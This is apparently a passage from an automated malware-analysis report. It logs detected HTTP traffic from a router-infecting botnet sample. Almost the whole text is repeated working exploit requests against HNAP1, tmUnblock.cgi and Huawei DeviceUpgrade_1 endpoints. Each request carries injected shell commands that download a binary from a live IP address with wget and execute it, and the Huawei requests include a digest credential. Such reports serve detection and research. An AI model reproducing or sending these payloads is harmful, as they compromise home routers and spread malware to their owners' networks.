6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 